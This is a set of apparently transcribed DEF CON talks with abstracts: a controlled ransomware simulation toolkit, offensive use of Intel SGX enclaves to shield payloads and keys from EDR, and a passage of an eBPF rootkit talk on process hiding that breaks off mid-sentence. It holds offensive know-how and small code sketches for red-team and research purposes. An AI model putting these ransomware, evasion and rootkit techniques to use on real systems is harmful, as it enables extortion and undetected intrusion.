Hello, DEF CON. Welcome to my talk, Racketeer: Prototyping Controlled Ransomware Operations. My name is Dmitry Snezhkov. I work at Protiviti on the Attack and Penetration Testing team, where I have a chance to do tooling, offensive research, and automation. And today we're going to talk about ransomware. Specifically, we're going to talk about simulating the lifecycle of ransomware, injecting into it, understanding it, and emulating the steps that need to happen to properly test it. Our talk is going to be split in two phases. In the first phase, we're going to talk about the problem and the construction of a solution from an architectural perspective. The second part of the talk is going to be the demo, where we dive into how the operation happens and what makes the Racketeer toolkit tick. Let's start. So ransomware is definitely a technical issue. It's implemented in technology. But what fascinates me about ransomware is that it's just such a good business model. It is just an efficient economic exit activity for a cyber attack. Consider that the bar of entry is low on the technical side and tooling is available. And encryption of the files, locking up the files, can happen almost immediately once the dropper actually gets onto the box. So as a ransomware deployer you don't really need to go to the second or third tier in the network, on the customer network. You can actually monetize right there and then. Also, the cost of deploying ransomware is much smaller than a lot of other cyber offenses. And with the advent, or actually the use, of crypto, the monetization and activation path is fast, right? You can even say that attribution is getting much more fragmented than before. And obviously, with such a business model, there's no wonder that ransomware has seen about 330% year-over-year growth. So if that's such a good business model, how do we emulate the testing for it? How do we inject into this? And how do we make sure we can actually trace what's going on, understand its capabilities, and react to it? Well, traditionally, we obviously need to contain, we need to keep on with preventative and detection controls, because ransomware is just another variation of an offensive on your network. You absolutely need to go across teams for disaster recovery drills and do your incident response triage. And one more thing is to add external negotiation with the ransomware party as part of your tabletop exercises. And so, just like everything else, a lot of times you can detect or prevent things, and you can actually minimize mean time between failures. And this is what the Racketeer tooling is attempting to achieve: essentially trying to emulate the path and the lifecycle of ransomware and allow the teams to get in the middle of that. And the way you do this is, obviously, you need to know your assets and data that ransomware may target, and you need to perform simulation and feedback. And that simulation and feedback is what we're going to talk about. But before we move on, let's just distill the lifecycle of ransomware into three things, literally: there is the persistence, where the dropper actually executes the task on the assets, be it files or anything else. Then there is an extortion capability, which may or may not happen in sequence. You can have offline negotiation, or you can have online IOCs popped in that say, hey, you know, you have T minus 48 hours to pay us, or else.
And then from the ransomware perspective, there is a de-stage, or decryption, capability that has to happen, and potentially cleanup, if you care about leaving the network intact and not causing a denial of service. And so the objective of the Racketeer tooling is to refine that process of injecting into this lifecycle to help teams on whatever side of the story: whether it's the tabletop to support the incident response and triage, whether it's providing optics into TTPs and actually doing collection of indicators of compromise that the teams can learn from, and, obviously, playing towards the red team side, where the objective is to implement the last-mile delivery of ransomware in your objectives through your campaigns. Obviously, for us as testers, we have to abide by SLAs, and it's good practice to keep the network intact and not perform or cause a denial of service. And so this is why we're calling our toolkit a controlled prototype of ransomware: it's a controlled run where you have precise targets and a balance of stealth and openness, so you can both showcase the capability but also open it up to defenders to inspect things. So if it is a ransomware simulation, what technical features does it need to have? Well, as we talked about before, we need to be correct and reliable in locking and unlocking assets, because we want to make sure that the customer stays up. Real-time encryption versus offline decryption of assets is very useful, because there are circumstances in ransomware campaigns where decryption and encryption happen separately, or the agent dies, and you should be able to bring the assets back into the unencrypted form as much as you can. Obviously, dormancy and activation: dropping the agent on the network does not mean it's going to get active and start encrypting things right away; we have to manage that. And because of that, we have to have flexibility in communications and in specifying targets and all that good stuff. So let's just try to build one. What would be a good agent for our purposes? Well, let's just target Windows, because it's the most prevalent target for ransomware historically. Obviously, that can be adapted to Linux or go cross-platform. But in this case, we're going to take a look at encrypting local files on Windows, and also encrypting files across the network; for example, you can remote into a different box through that agent and do the encryption of assets there. And obviously we need to have control of execution, as we mentioned before. The other technical features that we want to have in this agent are lifetime key management and key generation. Generation has to happen offline, because of both stealth and convenience: if you want to have an offline capability to decrypt the assets, you should be able to do that. And then we work through policies. We load policies into the agent, and the policies have to be flexible. They need to carry profiles with them, as far as how you connect to the box, what user ID you're using, how you shield credentials, all that good stuff. We mentioned offline asset recovery. And because of that, we actually operate on a hub-and-spoke model, where a commander accepts the agent and then manages it there. So, you know, from the construction of those features, what else?
We have to emulate communication the way ransomware usually interacts: obviously encryption on the transmission layer, but also application-level message encryption for the agent. That has become very prevalent, and we need to be able to inject into that. It operates on, or emulates, ransomware that does REST communication, your pub/sub type of deal where you come in, ask for a task, execute it, upload the results, and whatnot. So everything is sort of distributed in this way. What else do we need to do? Well, we mentioned the policy, but it also needs to be hot-patchable. So we need to be able to encrypt the assets, but we also need to be able to back out from the same policy so we don't lose correlation of the keys, again in real time or remotely, whichever the case may be. If we are testing customers and we are soliciting credentials, if we need, for example, to impersonate a user to go to a remote box on the network, i.e. laterally move to it, we want to make sure we put security on credentials. We don't want cleartext creds, so we're doing some encryption for that credential shielding. And then, obviously, we need to be flexible in how authentication maps happen: if we are going from one domain to another domain, or from non-domain to domain, we should be able to employ various profiles for connectivity on the network itself. So that plays to flexible operations. What else? We also want to have mutual authentication between the C2, or commander if you will, and the agent, so that the agent knows who its C2 is at the time of deployment and creation, and the C2 wants to accept only the agents that it knows about. And that plays into the delivery options and how agents get triggered. Sometimes you hard-code the policy into the agent to, let's say, get moving on an air-gapped network without C2 interaction, where you can drop an agent on the network and start encrypting things right away without accepting tasks from the C2. Or you can go the old route where you stay dormant until activated. Some notes on stealth versus transparency: one of the problems in ransomware is not knowing what's going on once agents are deployed. So we want to make sure we know at all times what's going on. We run logs on the agent, but those logs are in memory, and we're able to retrieve them and introspect, to get some optics into what's going on. And then, obviously, one of the interesting or needed features in our testing is to be able to clean up after ourselves: killing the agent, popping up notifications that it has been killed, or whatever the case may be, removing the threat from the network on our own. So we've talked a lot about the policy. And the policy is what ties everything together, right? You have flexible connectivity to C2s. You have profiles and connectivity. You've got authentication maps that match credential triplets to the hosts that they go to, on a domain or not. You also have flexibility on key generation, and whether you're encrypting assets with one key per host, or you have separate keys for each file, or a mix thereof. You can have situations where you can tier the priority on files: if one key is recovered, the other files stay encrypted as well.
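(To make the shape of such a policy concrete, here is a purely hypothetical sketch of those sections as C structures. This is not the actual Racketeer policy format — the field names and layout are illustrative assumptions only — but it captures the pieces just described: connectivity profiles, a master key and site ID, credential triplets, and per-host or per-file key scoping.)

/* policy_sketch.c -- hypothetical layout of such a policy, expressed as C
 * structures for illustration; NOT the actual Racketeer format. */
#include <stddef.h>
#include <stdint.h>

struct c2_profile {               /* connectivity section                      */
    char     endpoint[256];       /* REST endpoint the agent polls for tasks   */
    char     user_agent[128];     /* transport profile details                 */
    uint32_t poll_interval_s;     /* how often to ask the C2 for work          */
};

struct auth_profile {             /* credential triplet for remote operations  */
    char    username[64];
    char    domain[64];
    uint8_t sealed_password[256]; /* shielded, never stored in clear text      */
};

enum key_scope { KEY_PER_HOST, KEY_PER_FILE };

struct target {                   /* one host plus the files to lock on it     */
    char           host[64];
    enum key_scope scope;         /* one key per host, or one key per file     */
    int            auth_index;    /* which auth_profile to use to reach it     */
    size_t         n_paths;
    char         (*paths)[260];   /* file paths to operate on                  */
};

struct policy {
    uint8_t  master_key[32];      /* generated offline, pairs agent and C2     */
    char     site_id[37];         /* identifier of the site for this agent     */
    int      encrypt;             /* flip to 0 to reverse the policy (decrypt) */
    struct c2_profile   c2;
    struct auth_profile auth[4];
    struct target      *targets;
    size_t              n_targets;
};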
So this brings us to a demo where we can talk about specifics of deployment and operations of the Racketeer toolkit, and we'll come back to discuss other things later. Let's take a look at the operations of Racketeer. Here we have four windows. There's a C2. There's a utility box that helps manage encryption and master keys and site IDs, as well as decrypt encrypted files offline. And on top there are two windows that represent the simulated attack network. There's a non-domain-joined machine, and there's a domain-joined machine. And so our task for Racketeer is to go out and use the agent that gets deployed on the non-domain machine to manage, i.e. encrypt, the assets on it, and then pivot over to the domain box and do exactly that on the other side. But before we talk about the execution of it, we'd like to take a look at the policy file. So the policy file, as we've discussed, is the one that ties the tasks, communication, encryption keys, and authentication profiles for the agent, as seen by the operator from the outside. And there are multiple sections to it. There's a connectivity section with various profiles and security of communications. There is a REST profile and the endpoints it needs to talk to. There are keys, such as the master key, and the identifier of the site for the agent. There are also a series of authentication profiles that take the triplets — username, password, and domain — or operate on a local asset. And then there is an array of hosts and files that the agent's file connector is able to operate on, mixing and matching host keys with file keys. You can repeat these sections as many times as you would like to; these are very contained operations. And so in order for us to task the agent with execution, first we need to start the agent on the remote box. It starts up and we can see that it's running under PID 1940. Then we can activate it. Right now it's in a pending state. Let's activate the agent. And what we're going to do is accept the agent as part of our communication, which means that we only accept the agents that are the ones we know about. Then we can authenticate the agent to the C2 and the C2 to the agent by specifying the master key we've created before. And so we can send the master key to the agent, at which point it will know that it's talking to the C2 that it knows about and has been paired up with. And then we can actually send the policy which we've specified before. This policy is going to encrypt the assets across the board. It will take a while for it to respond, usually within the profile that you've specified, five to ten seconds or more. And as you can see, the agent actually operates on the assets locally and then goes out, using the authentication profile, to the domain, encrypting the assets on the other side. And as you can see, those assets are encrypted; as we're going to see in a moment, they are locked and the customer is forced to operate under those conditions. The same thing happens here. But the other thing that we need to be able to do, if we're not ready to decrypt offline, is actually reversing the policy. And the reverse of the policy is just a matter of specifying the operation type: flip a bit between encryption and decryption. And so what we're going to do is flip that policy back into decryption mode.
Same thing: policy execution, file decryption, the same keys that you specified. Or you can do it one by one: decrypt one file, all the files, none of the files. This should work. And once it decrypts the files, we will be able to see the content as it was there before, and essentially everything should be back to normal. One other thing that I would like to mention is the execution profile in memory. So we can work with the logs: set debug on the logs, which will increase the verbosity of the agent, and we can do a logs get on it, and we'll be able to see what it's doing there. And obviously, to align with our directives of working with, perhaps, triage teams, we can kick off a tabletop exercise by popping up a notification message on the host where the agent resides, that basically says: I am here, why don't you start taking care of what I'm doing here. We can do this by unhiding a console message, which will basically lock the box and show the notification, and then the triage process happens. Now, last but not least, the agent can self-terminate to clean up after ourselves. This will de-stage the agent, and the box will be clean with all the assets intact. Or, a variation on the theme: the files are locked and the agent is no longer in memory. How do you recover your assets? You talk to the ransomware team, and the ransomware team, by using the utilities on the utility box, is able to use the keys that were specified in the policy to decrypt files one by one, or all of them. This is the Racketeer toolkit. Okay, we're back. So what does it tell us? It tells us that we are able to simulate the lifecycle of controlled ransomware. We are able to maintain SLA and uptime on the network, try to deliver the last-mile monetization module for the teams that need it, and plug into the response process, either to support it or kick it off, and also learn more about the ransomware: where its deficiencies are and what its capacity is. So for defenders, I think it's safe to say: let's not signature this tool, but do pay attention to behaviors, because artifacts may be minimal, since it's all in memory, but the TTPs still exist — the lateral movement, the sequential encryption of the files. So all of that is still present. Bottom line is that IOCs are tied to implementation, and the agent has been deliberately weakened to showcase the injection points and analysis points. And obviously, instrument your environments so that you correlate operational performance and security messages. And with that, I want to thank everybody who listened and watched the demo. Here's the link to the open source code for Racketeer. Thank you very much.
|
Offensive testing in organizations has shown a tremendous value for simulating controlled attacks. While cyber extortion may be one of the main high ROI end goals for the attacker, surprisingly few tools exist to simulate ransomware operations. Racketeer is one such tool. It is an offensive agent coupled with a C2 base, built to help teams to prototype and exercise a tightly controlled ransomware campaign. We walk through the design considerations and implementation of a ransomware implant which emulates logical steps taken to manage connectivity and asset encryption and decryption capabilities. We showcase flexible and actionable ways to prototype components of fully remote ransomware operation including key and data management, as well as data communication that is used in ransomware campaigns. Racketeer is equipped with practical safeguards for lights out operations, and can address the goals of keeping strict control of data and key management in its deployment, including target containment policy, safe credential management, and implementing operational security in simulated operations. Racketeer can help gain better optics into IoCs, and is helpful in providing detailed logs that can be used to study the behavior and execution artifacts of a ransomware agent.
|
10.5446/54205 (DOI)
|
Hello, DEF CON. Welcome to Your House is My House: Use of Offensive Enclaves in Adversarial Operations. My name is Dmitry Snezhkov and I'm part of the Protiviti Attack and Penetration Testing team, where I have a chance to do tooling, offensive research and automation. Shout out to my team at Protiviti for making that happen. So today we're going to talk about SGX technology as it applies to offensive operations. Being part of the offensive team and tasked with testing, we sometimes find ourselves on unknown boxes, and sometimes we need to leverage the technology that exists there to be able to withstand the onslaught of EDR inspections or defensive technology inspections. And SGX was a curious case here: a developer was using SGX technology to protect trusted credentials, so the box was instrumented with SGX enclaves, which we thought — why not use them, and how can we use them to further our goals of bringing payloads in and taking care of secure communication for us? But first things first. SGX is a technology developed by Intel Corporation to essentially protect specific code or data from disclosure or modification by adversarial parties. Adversarial parties, as defined by Intel or the SGX technology, are anything that is not running in ring three: for example, privileged system code, the operating system, hypervisors and virtual machine managers, the BIOS — all the things that work around the hardware. And so SGX enclaves were born: a technology that solves, or tries to solve, the issue of protected areas of execution and increased security on platforms that are considered to be compromised by all the context that runs around them. So SGX enclaves, as we've defined, are trusted code, and they are also linked into the application. So the application runs in two modes, split-personality modes, right? One is the untrusted part of the code and the other is the trusted part of the code. The trusted or safe part of the code runs in the SGX enclave, which we construct, and we interact with the underlying bootstrapping and orchestration platform to be able to execute, or reach into, the trusted area and execute very specific operations from the untrusted memory, which is our application. That's made possible by SGX introducing two new opcodes for switching in and out of the trusted area on the CPU, with the enclave memory encrypted by a CPU key. And so this technology is quite prevalent in high-security environments: obviously wherever Intel Core sixth-plus-generation processors live — on laptops, business servers and data centers — but also in cloud virtual machines; namely, we found it on Azure DC-series trusted computing machines. And so if we find ourselves as operators on those machines, we might be able to use some of that protection for our purposes. So the offensive goals for us here are twofold. First is to understand the technology and how to construct the application so we can actually invoke SGX and use enclaves to store our data, which is payloads or other things. Also, to use SGX technology and the SDK to try and secure communications with our C2 without revealing the keys that we use for our payload encryption. And in the process, try to have the EDR divert attention from us by splitting the deployment model between several components that are not fully assembled or introspectable.
And so in this case, we're going to do Windows as an example. We're going to create a system called XClave — design a method of communication for our cradle to securely load our payloads and store them in the enclave on the box, but also hide the encryption algorithm and the keys, so they don't travel back and forth in clear text. Windows is the example in this case, but the Linux side would be pretty much the same in concept, although the implementation may be a little bit different. And hopefully we're going to have fun going through those exercises. One thing to mention is that this talk is not about SGX vulnerabilities or SGX deep dives; we're going to touch on some of the relevant parts, but refer to other great talks on the matter. The SGX components that will be interesting for us are, first, the platform software that gets installed to interact with the enclave. If we're dropping onto a box that has the appropriate type of CPU, and we're on a Microsoft Windows machine, then the operating system would already have the driver for it, because that's a standard update process. But you could obviously have other types of platform software if you're operating directly in an environment where SGX enclaves are used by developers to help their applications be more secure. So there are drivers there, and the orchestration software, such as the attestation service, which takes care of signing and verifying the enclaves themselves to the owner and to the system, i.e. the CPU. And the second part is the SDK, which we will use as part of the software development to create this application which will utilize enclaves. There are two SDKs; we're going to take a look at Intel's for the most part, but Open Enclave is also available for our purposes. So the outcome of our efforts would be an application, or a set of applications, created with trusted and untrusted parts — trusted being an SGX enclave, and untrusted being all the bootstrapping code that allows us to share information with our C2 and process payloads from that. And then we're going to go into a high-level mapping of how the calls from the C2 into the trusted area happen, and how we can leverage some of the primitives in the SGX SDK for our purposes, such as configuration, signing, and loading. Specifically, the problem of payload transfer can be distilled to a few things. First of all, we do not want to load payloads in the clear; we always want to protect them. And commonly, we protect that with some XOR key, maybe an AES key. But the problem is that the key itself may be available in memory, because it's a shared key a lot of times. And so it's inspectable, if not in real time in the sandbox, then in the forensic lab. And so if we're running a long-term campaign, we want to make sure we protect our keys in memory. The other thing is that the algorithm itself can be reversed, and our algorithm can pretty much be known — not because we don't want to share the algorithm, but because that algorithm may point to weaknesses in our communication, which may then be introspected and intercepted. And so the other goal is not only to store payloads, but also to use SGX to secure communication with our C2. To do that, there are a few alternatives. There are some crypto libraries that come with the PSW, the platform code, and the SDK.
It's sgx_tcrypto, the trusted crypto library. It is fairly limited in what it does, because its purpose is to facilitate the jobs of attestation and communication for session management. It's not general-purpose crypto, but we can use some parts of it to construct what we want. We can also bring third-party encryption to work with that, for example the OpenSSL or wolfSSL libraries. But the problem is target availability: we do not know if these libraries' runtimes are going to be available on the target. Plus, we want to stay away from loading things from disk as much as we can and operate in memory, and a lot of times it's too heavy or impossible to load those libraries in memory. And the third possibility, with the limited API that we have inside of the SGX enclave, the trusted area, is to roll our own, which is probably discouraged in this exercise anyway. And I mentioned limited access to APIs in the SGX enclave. The reason is that, because its very reason for existence is to protect the code inside of it, it is devoid of support for syscalls, and it has very limited I/O in and out of the enclave, mostly for state preservation, but not much else. So let's see what we can do. We're going to take the first approach, actually using sgx_tcrypto, and see what we can do and how we can build it. So upon research, we came up with three different things that we can do with that crypto in the SDK. We can generate an RSA key pair — a public and a private key. We can encrypt something with the public key and sign with the private key. And we can use a routine that works on AES symmetric keys to be able to encrypt some value inside and potentially transfer that something — that piece of code or data — outside of the enclave into the untrusted area. And so the idea here would be for us to create an application where we do just that. The first step would be to generate an RSA key set inside the trusted PRM, inside the enclave, give the public key out to our C2 and have it stored there; then the C2 would be able to generate the symmetric key and send it to us into the trusted PRM. We're going to store the symmetric key, and then we're going to have a shared symmetric key without leaking it, so we can generate a payload on the C2 side and keep transferring it into our trusted PRM without any inspection, or being worried about algorithm disclosure, payload disclosure, or key disclosure. So it's a three-step process. First, we generate the public/private keys and send the public key to the C2, which now has it; the C2 then encrypts a symmetric key and sends it to us; we store it in the trusted component, which decrypts the key because it was encrypted with the RSA key we already had from the previous step. And then we just share the symmetric key between the two. And that's how we achieve secure communication. As for the components that we want to have in this sort of construction, we thought of splitting it three ways. The application, which will be inspectable by defense and is loaded from disk — it's your implant or cradle or loader. Then there is the bridge between the enclave and that loader, which facilitates and brokers interaction — it takes data from one and passes it to another — but it's also a middleman that can be taken out of the equation upon first load.
So the EDR will not see all of the picture, and the bridge can come in as a memory-loaded module, which will be able to broker communication between the two — the enclave and the app — at runtime. And so the bridge is also assumed inspectable. And then the enclave, which is assumed obfuscated; we're going to have some notes on that later on in the limitations section. But yeah, the enclave is where we're going to store our keys and our algorithm. It will be loaded from disk, but it's also a secure library, which may not be introspectable. And then we need to start building that. And so we came up with the XClave system, which we're going to demo, and then we'll come back to talk more about its construction, limitations, and all the other things. Let's take a look at XClave, its components and its operations. Here we have a victim machine with an application, which is an agent or an implant. There's a bridge DLL, which facilitates interaction with the enclave. It may or may not be on disk; it may come directly from the network and be loaded that way in memory. And obviously, as we mentioned, there is a trusted piece of code that runs in the PRM. It makes sense to put the code in perspective insofar as to explain those components. The application finds the bridge. The bridge function, which is exported and found, is invoked. The bridge itself maps through the EDL to the enclave calls. Here's the EDL: essentially, it's a mapping, a matrix of the trusted calls that we can invoke inside the enclave and the untrusted calls that go the other way. And the enclave itself is the trusted code that essentially does the processing, does the encryption, and the other things that we need to keep secure. And obviously, on the other side, there's the C2, which should be able to match the crypto parameters one to one, so it's able to successfully decrypt and communicate with the XClave that resides inside the victim machine. And let's take a look at how that works. So essentially, we have two screens. One is the victim machine where all these components are deployed, and there is the C2. Let's start the C2. It listens on the port and it's responding to communication. Let's start the application. And the first thing it does is try to create an enclave. It's a standard procedure to create the memory mapping and launch things into existence. Once this is done, all the checks happen: are we running on a machine that supports SGX? Are we able to create it? What are the parameters and permissions that allow us, or don't allow us, to do this? And then it tries to generate an RSA key pair for communication. Once this is done, the public key and private key are available. The private key gets stored in the enclave, and the public key gets shared through the bridge to the application, which connects to the C2 and asks for storage of this public key on our side. Once this happens, the C2 carries out the task, does its processing, generates the symmetric key for communication, and sends the response back to the application, which proxies it through the bridge into the enclave, which stores it. And this is what we're doing here. So the shared key is now available. And now we are ready to map one-to-one encryption of the payload, or would-be payload, that would come from the C2 into the enclave — again through the app, through the bridge, into the secure area. And this is what's happening here: we're requesting that payload. The payload gets generated. In this case, it's a very contrived example.
And it gets encrypted to match the mode and the capabilities of the enclave. All that processing happens, and the payload travels back to the agent and ultimately to the enclave. And the enclave, having the symmetric key, is now able to decrypt the payload. After this is done, the payload gets stored in clear text in the enclave, but it's protected from any kind of reachability by the defense, and then the attacker can actually work with it. And last but not least, once we have created the enclave, we can destroy it if we don't need it anymore, for whatever reason and for whatever duration we wanted to use it. Once this is done, everything is good, and we are ready to move on. Okay. So we saw a presentation of how XClave works. There are some assumptions and limitations to this. First of all, it's a bad coding practice. We are weakening the enclaves; we're misusing them. But our idea is that while the technology can be used as is, a lot of times EDRs do not inspect enclaves. In our testing, we were able to compile in pre-release or debug mode and then use the whitelisted test signing keys to do that. In theory, that should prevent us from debugging into it, which is true. The EDRs themselves do not actually make the leap of inspecting enclaves anyway. And the other side of the story is that in order to do it properly, you need an attestation key, and have Intel provision one and sign it with its root key, and then you can sign your enclave, which will be undebuggable. But in this case, you're running into an attestation — meaning attribution — issue. And so we went the other route and said, hey, what can we do with pre-release or debug versions of it? Non-attested enclaves are supposed to be inspected, but in practice, they're often not. And as we mentioned before, on SGX-provisioned machines the PSW services — the platform software — are installed, and the sgx_tcrypto library of cryptographic primitives is present. So that should let us live off the land once we arrive at an SGX-enabled machine. And one thing to note, on how you help defenders understand what the enclaves are and how to find the rogue ones: you need to watch for signatures and identify non-approved SGX enclaves. The way you would do this is with a really nice tool, Kudelski Security's sgxfun, to dump the enclave DLL, see the details of that enclave, and latch on to keys that you have not provisioned. So I'd like to thank everybody who has come to my talk. Here's the link to a proof of concept — the bridge library, the enclave and the application — which we've used in this presentation. Thank you very much.
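(To make the trusted/untrusted split described above a bit more concrete, here is a minimal, heavily simplified sketch of an EDL mapping and a trusted call that unwraps a payload with the sgx_tcrypto AES-GCM primitive. The names and the blob layout are illustrative assumptions, not the actual XClave proof-of-concept API.)

/* enclave.edl -- the trusted/untrusted "matrix" mentioned above (illustrative):
 *
 *   enclave {
 *       trusted {
 *           public int ecall_store_payload([in, size=len] const uint8_t *blob,
 *                                          size_t len);
 *       };
 *       untrusted { };
 *   };
 */

/* enclave.c -- trusted side, built with the Intel SGX SDK */
#include <stdint.h>
#include <string.h>
#include "sgx_error.h"
#include "sgx_tcrypto.h"

#define MAX_PAYLOAD 4096

/* symmetric key received (RSA-wrapped) from the C2 and kept inside the PRM */
static sgx_aes_gcm_128bit_key_t g_shared_key;
static uint8_t  g_payload[MAX_PAYLOAD];
static uint32_t g_payload_len;

/* blob layout assumed here: [12-byte IV][16-byte GCM tag][ciphertext] */
int ecall_store_payload(const uint8_t *blob, size_t len)
{
    if (len < 28 || len - 28 > MAX_PAYLOAD)
        return -1;

    const uint8_t *iv = blob;
    const sgx_aes_gcm_128bit_tag_t *tag =
        (const sgx_aes_gcm_128bit_tag_t *)(blob + 12);
    const uint8_t *ct = blob + 28;
    uint32_t ct_len = (uint32_t)(len - 28);

    /* plaintext never leaves the enclave: it lands in g_payload inside the PRM */
    sgx_status_t st = sgx_rijndael128GCM_decrypt(&g_shared_key,
                                                 ct, ct_len,
                                                 g_payload,
                                                 iv, 12,
                                                 NULL, 0,
                                                 tag);
    if (st != SGX_SUCCESS)
        return -1;

    g_payload_len = ct_len;
    return 0;
}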
|
As developers start to rely more on hardware-based memory encryption controls that isolate specific application code and data in memory - secure enclaves, adversaries can use enclaves to successfully coexist on the host and enjoy similar protections. In this talk we venture into a practical implementation of such an offensive enclave, with the help of Intel SGX enclave technology, supported on a wide variety of processors present in enterprise data-centers and in the cloud. We discuss how malware can avoid detection in defensively instrumented environments and protect their operational components from processes running at high privilege levels, including the Operating System. We dive deeper into using enclaves in implants and stagers, and discuss the design and implementation of an enclave that is capable of facilitating secure communication and storage of sensitive data in offensive operations. We cover how the enclaves can be built to help secure external communication while resisting system and network inspection efforts and to achieve deployment with minimal dependencies where possible. Finally, we release the enclave code and a library of offensive enclave primitives as a useful reference for teams that leverage Intel SGX technology or have the hardware platform capable to support such adversarial efforts.
|
10.5446/54207 (DOI)
|
Hi, and welcome to our talk. My name is Guillaume Fournier. I'm a security engineer at Datadog, and today Sylvain Afchain and I are going to present the rootkit that we implemented using eBPF. If you don't know what eBPF is, don't worry, we are going to present this technology and tell you everything you need to know in order to understand the talk. So let's start with a few words about us. We are the cloud workload security team. We usually use eBPF for good, and our goal is to detect threats at runtime. Everything we do is added to the Datadog Agent, which is an open source project, so feel free to check it out if you are interested. That being said, for DEF CON, we decided to use everything we knew about eBPF to build the ultimate rootkit. So as I said before, we are going to start the talk with a brief introduction to eBPF. Then Sylvain will take over to talk about how we implemented obfuscation and persistent access in our rootkit. After that, I will come back to present the command and control feature along with some data exfiltration examples. And then I will talk about the network discovery and RASP bypass features of the rootkit. And finally, Sylvain will present a few detection and mitigation strategies that you can follow to detect rootkits such as ours. All right, so let's start with eBPF. eBPF stands for extended Berkeley Packet Filter. It is a set of technologies that can run sandboxed programs in the Linux kernel without changing the kernel source code or having to load kernel modules. It was initially designed for network packet processing, but many new use cases were progressively added. So for example, you can now use eBPF to do kernel performance tracing along with network security and runtime security in general. So how does it work? eBPF is simply a two-step process. First, you have to load your eBPF programs in the Linux kernel, and then you need to tell the kernel how to trigger your programs. So let's have a look at the first step. eBPF programs are written in C. Well, it's not exactly C; it's more like a subset of C, because of the many restrictions that eBPF has to follow. But I'm going to talk about this later. So once you have your C program, you can use LLVM to generate eBPF bytecode, which you can then load into the kernel using the bpf syscall. eBPF programs are really made of two different things: eBPF maps and the actual program. So there are a lot of different types of eBPF maps, but all you need to know is that they are the only way to persist data generated by your eBPF programs. Similarly, there are a lot of different program types, and each program type has its own use case. However, regardless of the program type, each program has to go through the same following two phases. The first one is the verifier step. I will talk about this later, but for now, just know that this ensures that your program is valid. And second, your eBPF bytecode will be converted into machine code by a just-in-time compiler. And when those two phases succeed, your program is ready to be executed. Step two is attaching eBPF programs. In other words, this is when you tell the kernel how to trigger your program. There are many different program types, and I can't present them all, but I'm just going to talk about four of them. So for example, you can use a kprobe to trigger an eBPF program whenever a specific symbol in the kernel is called.
Tracepoints are similar to kprobes, but the hook points on which they can be attached have to be declared manually by the kernel developers. Those two program types require another syscall in order to be attached, and this syscall is the perf_event_open syscall. So the other two program types I wanted to talk about are TC classifiers, so SCHED_CLS, and XDP programs. Those program types can be used to do packet processing, whenever some network traffic is detected at the host level or at a specific network interface level. Those two require a netlink command to be attached. And the only thing to remember here is that each program type has its own setup, and thus may require a different level of access. Another very important fact about eBPF is that eBPF maps can be shared between different programs regardless of their program types. All right, so the eBPF verifier. The verifier is used to ensure that eBPF programs will finish and won't crash. To do so, it's really just a list of rules that the verifier checks, and your program has to comply with those rules. So for example, your program has to finish; it cannot be an infinite loop, so your program has to be a directed acyclic graph. You cannot have unreachable code, you cannot have unchecked dereferences, your stack size is limited, and your overall program size is also limited. And finally, one of the most infamous features of the verifier is its very cryptic output. Basically, if your program doesn't pass the verifier step, you will get a huge log of everything that the verifier looked into, and eventually some kind of error telling you what happened. But yeah, basically you are in for a very painful debugging session. Last but not least, eBPF comes with a list of helpers that will help you access data or execute operations that you wouldn't be able to write natively. So for example, you have context helpers, you have map helpers — a lot of things that you wouldn't be able to write in C and that you would need external instrumentation to do. In short, you have about 160 helpers, and most of the heavy lifting of your eBPF programs will be based on those helpers. So that concludes this introduction to eBPF, and I will hand it over to you, Sylvain, so that you can kick off the presentation of the rootkit. Thank you, Guillaume. Before we get into the details, let's see why eBPF is an interesting technology to write a rootkit. First, the safety guarantee brought by eBPF means that a bug in our rootkit cannot crash the host. An error in the execution will not cause any log message to be emitted. User space has no way to know that something actually went wrong, and no one notices the presence of the rootkit. As we saw earlier, the eBPF bytecode is converted to native code, and the number of instructions is limited, which limits by extension the performance impact that our rootkit can have on the machine, which could otherwise be detected by the user. On the commercial side, eBPF is used by an increasing number of vendors, in various use cases — network monitoring and security, for instance. With eBPF becoming widespread, the chance of one product being abused to load malicious programs also increases. The safety guarantee we just talked about should not give security administrators a false feeling of security. There is a lot of activity around eBPF, and each new version of the Linux kernel comes with a new set of eBPF helpers, bringing new capabilities.
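(To make the "maps plus program" structure described above concrete, here is a minimal, illustrative libbpf-style eBPF object — not code from the rootkit itself — with one hash map and one kprobe, compiled the way just described with clang targeting BPF and loaded through the bpf syscall. The hooked symbol and the counter are arbitrary examples.)

// minimal_probe.bpf.c -- one map, one kprobe, nothing more.
// Build (vmlinux.h generated with bpftool): clang -O2 -g -target bpf -c minimal_probe.bpf.c
#include "vmlinux.h"
#include <bpf/bpf_helpers.h>
#include <bpf/bpf_tracing.h>

char LICENSE[] SEC("license") = "GPL";

/* an eBPF hash map: the only way to persist data between program runs */
struct {
    __uint(type, BPF_MAP_TYPE_HASH);
    __uint(max_entries, 1024);
    __type(key, u32);    /* pid */
    __type(value, u64);  /* number of openat() calls observed */
} open_counts SEC(".maps");

/* triggered every time the kernel symbol is hit, once the program is attached */
SEC("kprobe/__x64_sys_openat")
int BPF_KPROBE(count_openat)
{
    u32 pid = bpf_get_current_pid_tgid() >> 32;
    u64 one = 1, *val;

    val = bpf_map_lookup_elem(&open_counts, &pid);
    if (val)
        __sync_fetch_and_add(val, 1);
    else
        bpf_map_update_elem(&open_counts, &pid, &one, BPF_ANY);

    return 0;
}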
As we wanted our rootkit to run on widely used Linux distributions, such as Red Hat Enterprise Linux or the latest Ubuntu LTS, we used a limited number of helpers. Using recent helpers or features like KRSI would have probably made the development of the rootkit easier. One of the primary tasks of a rootkit is to hide itself. What does that mean in our case? eBPF programs are bound to a running process. If this process gets killed, all the attached eBPF programs will be unloaded. For that reason, it is essential that we both hide our process and protect it from being killed. The eBPF programs and maps used by the rootkit should also be hidden, and we should forbid other programs from gaining access to them through their file descriptors. Let's see our rootkit in action. Let's start the rootkit. It gives us its PID. Then we can try a ps command in order to see if we can detect it in the output. We can try using its procfs entry: nothing. We can even try using a subfolder or even a relative path: we still have the same issue, "no such file or directory". Finally, we can try to send it a signal to see what happens, and we get a "no such process" error. The obfuscation capabilities of our rootkit mainly rely on the use of two eBPF helpers. The bpf_probe_write_user helper allows our eBPF program to write into the memory of the process that issues a syscall. This can be used, for instance, to alter the data that is returned by a syscall. It's also possible to alter the syscall arguments. There is one caveat with this helper: the memory to be modified has to be already mapped into the address space. Otherwise, a minor or major page fault will be triggered, causing the bpf_probe_write_user call to fail. The other helper is bpf_override_return. This one allows you to change the return value of a syscall, and it has an interesting property: if this helper is used at the syscall exit, it will simply change the return value of the executed syscall; but if we use it at the entry of the syscall, the execution of the syscall will be completely skipped. It 